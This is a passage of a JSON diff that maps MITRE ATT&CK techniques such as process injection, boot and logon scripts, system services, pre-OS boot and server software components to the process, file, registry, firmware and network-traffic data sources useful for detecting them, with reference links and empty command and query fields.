+ "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1055.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": 
"process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process access", + "description": "A process was accessed.", + "source_data_element": "process", + "relationship": "requested access to", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1037.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "active directory", + "definition": "Information associated with the Active Directory service or objects (Such as a user, a group, or a workstation) and activity around them.", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Azure AD" + ], + "data_component": "active directory object modification", + "description": "An active directory service or object was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "ad object" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + 
"https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + ] + ] + }, + { + "technique_id": "T1543", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service creation", + "description": "A service/daemon was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "service", + "definition": "Information about software programs that run in the background and typically start with the operating system.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "service modification", + "description": "A service/daemon was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "service" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": 
"user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used 
through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key creation", + "description": "A registry key was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": 
"Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key" + }, + { + "data_source": "windows registry", + "definition": "Information about configuration data used by applications and system components.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "windows registry key modification", + "description": "A registry key was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "windows registry key value" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file creation", + "description": "A file was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "file" + }, + { + "data_source": "file", + "definition": "Information about file objects (All file systems) that represent computer resources that can be managed by the I/O system. 
This data source can be used as a reference to extend the concepts of other data sources such as driver, module, and network share.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network" + ], + "data_component": "file modification", + "description": "A file was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "file" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/dotnet/framework/windows-services/introduction-to-windows-service-applications", + "https://www.linux.com/news/introduction-services-runlevels-and-rcd-scripts/" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/sysinfo/registry" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-management", + "https://docs.microsoft.com/en-us/windows/win32/fileio/file-streams", + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/backup-and-storage/fat-hpfs-and-ntfs-file-systems" + ] + ] + }, + { + "technique_id": "T1542.003", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "drive", + "definition": "Information associated with drive storage regions.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "drive modification", + "description": "A drive partition was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "drive" + } + ], + "external_reference": [ + [ + "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=90009" + ] + ] + }, + { + "technique_id": "T1542.002", + "command_list": [], + 
"commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "driver", + "definition": "Information associated with device drivers, or computer programs that operate or control a particular type of device that is attached to a computer.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Linux", + "macOS", + "Windows" + ], + "data_component": "driver metadata", + "description": "Data and information that describe a driver and activity around it such as driver issues reporting and driver integrity (Page hash, code) checking.", + "source_data_element": "host", + "relationship": "retrieved information about", + "target_data_element": "driver" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", 
+ "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + [ + "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html", + "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + ], + null, + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ] + ] + }, + { + "technique_id": "T1542.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + "description": "The firmware of a system component was modified.", + "source_data_element": "user", + "relationship": "modified", + "target_data_element": "firmware" + }, + { + "data_source": "firmware", + "definition": "Information associated with computer software that provides the low-level control for a device's specific hardware.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "firmware modification", + 
"description": "The firmware of a system component was modified.", + "source_data_element": "process", + "relationship": "modified", + "target_data_element": "firmware" + } + ], + "external_reference": [ + null + ] + }, + { + "technique_id": "T1505.001", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1542", + "command_list": [], + "commands": [], + "parsed_datasets": [], + "queries": [], + "possible_detections": [ + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + 
"Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
